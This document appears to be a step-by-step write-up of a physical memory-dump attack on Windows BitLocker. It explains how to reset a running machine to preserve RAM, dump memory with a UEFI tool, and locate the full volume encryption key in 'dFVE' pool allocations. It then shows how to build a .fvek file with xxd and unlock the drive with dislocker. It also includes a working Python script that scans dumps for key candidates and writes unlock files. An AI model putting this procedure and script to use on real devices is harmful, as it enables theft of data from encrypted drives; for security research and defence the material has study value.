An attacker with physical access can exploit a weakness in how Windows handles secrets in memory: by abruptly restarting the device and dumping RAM, they can potentially recover sensitive material such as the BitLocker FVEK (full volume encryption key), despite obstacles such as memory degradation (bit decay) while the machine is restarting.
Techniques such as shorting the motherboard's reset pins restart the system without cutting power, so the RAM contents survive the restart. Secure Boot offers some protection against booting an unsigned dumping tool, but it has limitations and can be bypassed in various ways.
To create the bootable USB device you need a USB drive larger than the target system's RAM, since the whole dump has to fit on it; the `flashimage.sh` script simplifies writing the image to the drive.
Abruptly restart the target system while Windows is loading but before the login screen appears: this keeps downtime short, and it is a particularly useful state for finding FVEK keys.
To start the memory dump, immediately boot the system from the USB device containing the Memory-Dump-UEFI application, which launches a UEFI shell. Within the shell, navigate to and execute the `app.efi` file.
How long the dump takes depends on the amount of RAM in the system and the write speed of the USB device. To avoid overwriting data on the wrong device, disconnect any other USB storage devices before proceeding.
The utility writes dump files until all of system memory has been copied; once it has finished, shut the computer down safely.
An analysis of Windows 11 memory dumps shows that the FVEK can be found in several locations; the primary one is memory pools tagged "dFVE", allocated by the dumpfve.sys driver, which handles BitLocker-encrypted crash dumps.
The key is typically preceded by the bytes 04 80, i.e. the algorithm ID 0x8004 (XTS-AES-128) in little-endian order. The key, or parts of it, also turns up in pools tagged "None", the default tag for untagged allocations made through the ExAllocatePool routine.
To unlock a BitLocker-protected partition, determine the algorithm in use and obtain the corresponding key. Prepend the algorithm ID in little-endian byte order (0x8004 becomes 0480) to the hex-encoded key.
Write the combined value to a file as raw bytes, for example with `echo "0480b2cbc06071931b7cc50b59f8789571f4dd815c2008e93c02d5c6cd98c83ef54b" | xxd -r -p > output.fvek` (2 bytes of algorithm ID followed by the 32-byte XTS-AES-128 key).
Use the dislocker suite to confirm the algorithm and unlock the drive: dislocker-metadata inspects the volume metadata, and dislocker's `-k` (`--fvek`) option takes the generated `output.fvek` file so that the data on the BitLocker-protected partition can be accessed.
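As an added example, not code from the original page or from the Memory-Dump-UEFI project, the following Python script automates the search described above: it scans a raw dump for "dFVE" pool tags, looks for a little-endian algorithm marker shortly after each tag, pulls out the key bytes that follow it, and builds the same 2-byte-ID-plus-key file the `xxd` command produces. Assumptions not taken from the page: the 0x400-byte search window after a tag, the table of algorithm IDs and key lengths (as named in dislocker's encryption types), and the constructed sample "dump", which embeds the page's example key.

```python
import re
import struct
import sys
from pathlib import Path

# BitLocker encryption-method IDs as dislocker names them (assumption: taken
# from dislocker's encryption types, not from the page). value = (name, key bytes)
BITLOCKER_ALGOS = {
    0x8002: ("AES-CBC-128", 16),
    0x8003: ("AES-CBC-256", 32),
    0x8004: ("XTS-AES-128", 32),   # the case on the page: marker bytes 04 80
    0x8005: ("XTS-AES-256", 64),
}

POOL_TAG = b"dFVE"  # pool tag used by dumpfve.sys allocations


def find_fvek_candidates(dump: bytes, window: int = 0x400, algo_ids=(0x8004,)):
    """Return [(marker_offset, algo_id, key)] for every little-endian algorithm
    marker found within `window` bytes after a dFVE pool tag.
    The window size is an assumption; the page only says the key is
    'typically preceded by' the marker inside dFVE-tagged pools. Several
    candidates may come back (04 80 can occur by chance); try each with dislocker."""
    results = []
    seen = set()
    for m in re.finditer(re.escape(POOL_TAG), dump):
        region_start = m.end()
        region = dump[region_start:region_start + window]
        for algo_id in algo_ids:
            _, key_len = BITLOCKER_ALGOS[algo_id]
            marker = struct.pack("<H", algo_id)  # 0x8004 -> b"\x04\x80"
            pos = region.find(marker)
            while pos != -1:
                key_start = region_start + pos + 2
                key = dump[key_start:key_start + key_len]
                # skip truncated keys, all-zero (already wiped) buffers and repeats
                if len(key) == key_len and key != b"\x00" * key_len and key not in seen:
                    seen.add(key)
                    results.append((key_start - 2, algo_id, key))
                pos = region.find(marker, pos + 1)
    return results


def build_fvek_file(algo_id: int, key: bytes) -> bytes:
    """Same layout the page builds with xxd: 2-byte little-endian algorithm ID
    followed by the raw key bytes (0x8004 -> 04 80 ...)."""
    name, key_len = BITLOCKER_ALGOS[algo_id]
    if len(key) != key_len:
        raise ValueError(f"{name} expects a {key_len}-byte key, got {len(key)}")
    return struct.pack("<H", algo_id) + key


# Constructed sample "dump" (not a real memory image): filler, a fake 16-byte
# pool header carrying the dFVE tag, unrelated allocation bytes, then the
# 0x8004 marker followed by the page's example key.
SAMPLE_KEY = bytes.fromhex(
    "b2cbc06071931b7cc50b59f8789571f4dd815c2008e93c02d5c6cd98c83ef54b")
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"\x00\x00\x00\x02" + POOL_TAG + b"\x00" * 8   # fake pool header
    + b"\x11" * 40                                 # unrelated content
    + struct.pack("<H", 0x8004) + SAMPLE_KEY
    + b"\x22" * 64
)


if __name__ == "__main__":
    # Usage: python fvek_scan.py [dump-file]; without an argument the sample is used.
    dump = Path(sys.argv[1]).read_bytes() if len(sys.argv) > 1 else SAMPLE_DUMP
    for n, (off, algo_id, key) in enumerate(find_fvek_candidates(dump)):
        name = BITLOCKER_ALGOS[algo_id][0]
        print(f"candidate {n}: offset {off:#x} {name} key {key.hex()}")
        # equivalent of: echo "0480<key>" | xxd -r -p > output.fvek
        Path(f"output{n}.fvek").write_bytes(build_fvek_file(algo_id, key))
```

Each candidate is written to its own `.fvek` file so that they can be tried in turn with `dislocker -k outputN.fvek`; a dump with several dFVE allocations, or stale copies of an older key, will produce more than one.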
Kernel-level debugging with WinDbg, either against a VM or over a USB 3.0 A/A debug cable, lets users watch BitLocker's implementation in action during the Windows boot process.
While Microsoft attempts to securely erase keys with functions such as SymCryptSessionDestroy, NoItinRD's analysis shows that not all key material is actually destroyed.
Stepping through the boot process, users can watch these key remnants persist on the heap, which points to a weakness in BitLocker's key management and destruction and gives an attacker further places to look for key material.